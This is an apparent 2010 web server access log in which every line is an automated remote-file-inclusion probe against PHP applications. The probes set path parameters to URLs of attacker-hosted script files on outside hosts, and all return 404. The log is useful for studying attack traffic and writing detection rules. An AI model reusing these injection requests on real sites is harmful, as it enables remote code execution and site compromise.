200.93.147.154 - - [07/Feb/2010:22:01:25 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:22:03:58 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:22:03:58 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:22:03:58 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:22:03:59 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:22:03:59 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:22:03:59 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [07/Feb/2010:22:04:10 -0800] "GET /logs/access_090914.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [07/Feb/2010:22:04:10 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [07/Feb/2010:22:04:10 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
89.221.175.60 - - [07/Feb/2010:22:05:11 -0800] "GET /logs/access_090914.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [07/Feb/2010:22:05:11 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [07/Feb/2010:22:05:11 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:22:07:11 -0800] "GET /logs/access_100201.log%20%20//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:22:07:11 -0800] "GET /delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:22:07:11 -0800] "GET /logs//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [07/Feb/2010:22:08:12 -0800] "GET /logs/access_091019.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:08:57 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.221.175.60 - - [07/Feb/2010:22:08:59 -0800] "GET /logs/access_091019.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:09:02 -0800] "GET /logs/access_091019.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:09:02 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.221.175.60 - - [07/Feb/2010:22:10:49 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:22:11:28 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:32 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:32 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:42 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:54 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:54 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:54 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:55 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:56 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:56 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:11:59 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:12:03 -0800] "GET /logs/access_091005.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:06 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:07 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:08 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:09 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:11 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:54 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:54 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [07/Feb/2010:22:12:55 -0800] "GET /logs/access_090914.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [07/Feb/2010:22:12:55 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [07/Feb/2010:22:12:56 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:12:58 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:13:35 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:13:35 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:13:36 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:14:01 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:14:02 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:14:05 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [07/Feb/2010:22:14:13 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:15:28 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:17:36 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:17:36 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:17:36 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:21:47 -0800] "GET /include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:21:47 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:21:51 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:22:25 -0800] "GET /logs//chatwindow.php?uebergabe=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:22:25 -0800] "GET /chatwindow.php?uebergabe=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [07/Feb/2010:22:22:25 -0800] "GET /logs/access_091130.log%20%20//chatwindow.php?uebergabe=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:22:32 -0800] "GET /bbs/write_comment_update.php/?board_skin_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:22:32 -0800] "GET /logs//bbs/write_comment_update.php/?board_skin_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:22:32 -0800] "GET /logs/access_100201.log%20%20//bbs/write_comment_update.php/?board_skin_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [07/Feb/2010:22:22:48 -0800] "GET /logs/access_091019.log/e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:22:49 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:22:49 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:22:49 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:22:51 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php/?board_skin_path=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:23:18 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:23:18 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:23:18 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:23:25 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:24:12 -0800] "GET /include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:24:15 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:22:24:17 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:25:13 -0800] "GET /chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:25:13 -0800] "GET /logs//chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:25:13 -0800] "GET /logs/access_091130.log%20%20//chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:26:00 -0800] "GET /logs//chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:26:00 -0800] "GET /chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:22:26:00 -0800] "GET /logs/access_091130.log%20%20//chatwindow.php?uebergabe=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:22:29:55 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:22:29:55 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:22:29:55 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:30:52 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:31:03 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:31:03 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [07/Feb/2010:22:31:03 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:31:27 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:31:28 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:31:28 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:57 -0800] "GET /logs/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:57 -0800] "GET /logs/access_091214.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:57 -0800] "GET /com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:59 -0800] "GET /com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:59 -0800] "GET /logs/access_091214.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:31:59 -0800] "GET /logs/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:19 -0800] "GET /logs/access_091214.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:19 -0800] "GET /com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:19 -0800] "GET /logs/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:32:33 -0800] "GET /logs/access_090720.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:38 -0800] "GET /logs/access_091019.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:40 -0800] "GET /logs/access_091019.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:22:32:51 -0800] "GET /logs/access_091019.log/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:33:51 -0800] "GET /logs/access_090720.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:34:06 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.44.42 - - [07/Feb/2010:22:34:36 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
69.175.44.42 - - [07/Feb/2010:22:34:37 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:35:15 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:36:58 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.44.42 - - [07/Feb/2010:22:37:22 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
69.175.44.42 - - [07/Feb/2010:22:37:30 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:38:36 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
